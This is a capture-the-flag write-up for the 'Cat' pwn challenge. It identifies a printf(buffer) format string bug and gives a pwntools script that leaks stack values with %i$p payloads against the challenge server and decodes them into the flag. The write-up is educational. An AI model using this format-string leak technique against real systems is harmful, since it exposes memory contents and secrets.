Cat
Description
pwn/cat (by hmmm) | 435 points
Cat is the true standard text editor.
nc cat.hsctf.com 1337
Analysis
Program opens the flag.txt, reads and writes into flag buffer. After that input buffer is defined which simply echos the input.
Vulnerability = printf(buffer);
Solution
I used the script from CryptoCat writeup video which fuzzes the (similar) program, decodes value and builds the flag.
from pwn import *
context.log_level = 'info'
flag = ''
# Let's fuzz x values
for i in range(8, 20):
try:
# io = process('./chall', level='warn') # Local
io = remote('cat.hsctf.com', 1337, level='warn') # Connect to server
# Format the counter
# e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int)
io.sendline(f'%{i}$p'.encode())
# Receive the response (leaked address followed by '.' in this case)
result = io.recvline()
# Ignore null values
if b'nil' in result: continue
print(f'{i}: {result}')
try:
# Decode, reverse endianess and print
decoded = unhex(result.strip().decode()[2:])
reversed_hex = decoded[::-1]
print(str(reversed_hex))
# Build up flag
flag += reversed_hex.decode()
except BaseException:
...
io.close()
except EOFError:
io.close()
# Print and close
info(flag)Last updated